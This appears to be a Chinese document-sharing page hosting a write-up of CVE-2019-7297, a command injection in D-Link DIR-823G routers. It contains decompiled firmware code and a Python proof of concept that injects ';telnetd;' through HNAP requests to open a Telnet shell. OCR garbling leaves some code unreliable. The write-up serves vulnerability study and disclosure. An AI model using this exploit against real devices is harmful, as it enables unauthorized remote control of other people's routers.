(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx

上传人:李司机 文档编号:6068783 上传时间:2023-09-19 格式:DOCX 页数:4 大小:39.34KB
返回 下载 相关 举报
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第1页
第1页 / 共4页
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第2页
第2页 / 共4页
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第3页
第3页 / 共4页
(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx_第4页
第4页 / 共4页
亲,该文档总共4页,全部预览完了,如果喜欢就下载吧!
资源描述

《(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-7297)D-Link DIR-823G 命令注入漏洞.docx(4页珍藏版)》请在三一办公上搜索。

1、(CVE-2019-7297) D-Link DIR-823G 命令注入漏洞一、漏洞简介D-Link DIR 823G 1.02B03及之前的版本中存在命令注入漏洞,攻击者可通过发送 带有shell元字符的特制/HNAPl请求利用该漏洞执行任意的操作系统命令。GetNetworkTomographyResult函数中调用system函数,执行的内容中包括不受 信任的用户输入AddreSS字段,攻击者可以远程执行任意命令。二、漏洞影响D-Link DIR 823G 1.02B03 及之前的版本三、复现过程漏洞分析漏洞原理中提到的GetNetworkTOniographyResult函数是在goa

2、head二进制文件 中实现的。在FunctionJist中找到对应而函数地址。GetNetWOrkTOmOgraPhyReSUIt 获取 address, number, SiZe 参数,作为 Ping 的 参数。,rr . ajub_get (puts Cerror, pmb get MIBePINGeNUMBEK);)else (strcat(acStack2S2r* -c w);prlntf(char )$ ,:-Qd -v drnuxer trlen(char ),9Wic ;-, (char ) 4.,Varl psabs9ec(0xU749size);if (Varl - O) p

3、ut.sC,error, epoxb get MIB_PIHG_5XZf); ) else (9trcAtft: tac-: rw -9 );sprlntf(char )_二JW.e:工20);_n *rlen(char )loc1_120);trac4t( : 3 r (car )t._: ,_:,“9trct tappng.tx 2txppng.tx);Puts(AcStazaJIfiC);syaten(- :Sta:c2eo);_3tr*ar - fopen(auppng.txt*v rIf (_itreax 0x0)(puts(tppng.tMt is NULL):ping addre

4、ss -c number -w number -s size tmpping.txt 2tmpping.t t但在system之前并没有对这些外来参数进行检查,如果address为;telnetd;就 能启动Telnet服务。可以看出这些参数都是通过apmib_get获取的,那么在之前 一定有apmib_set进行设置,在IDA中查找关键字0xlb72, 0xlb73, 0xlb73, 定位到apmib_set的位置,结合ghidra的反汇编代码,确定在 SetNetworkTomographySettings函数中可以对这些参数进行设置。,4tl H*lLoS3%rin9(0tlFnC. ?

5、pocimport requests from pwn import *IP=192.168.0.1, headers = requests. utils. default_headers()headersUser- Agent = ,Mozilla5.0 (Windows NT 10.0; Win64; 64) Appl eWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 headersSOAPAction = , raphySettingsheaders,Content-Type = tetml; Cha

6、rset=UTF-8headersAccept=*/*headersAccept-Encoding=gzip, deflateheaders Accept-Language =,zh-CNj zh;q=0.9,en;q=0.8 payload = jtelnetd;44,r = requests.post(,http:/+IP+HNAP1,i headers=headers data=payload) print r.textheadersSOAPAction = ,http:/ZHNAPlGetNetworkTomog raphyResult,payload = r = requests.post(http:/,+IP+HNAP1,i headers=headersj data=payload) print r.text p=remote(IP,23) p.interactive(

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 生活休闲 > 在线阅读


备案号:宁ICP备20000045号-2

经营许可证:宁B2-20210002

宁公网安备 64010402000987号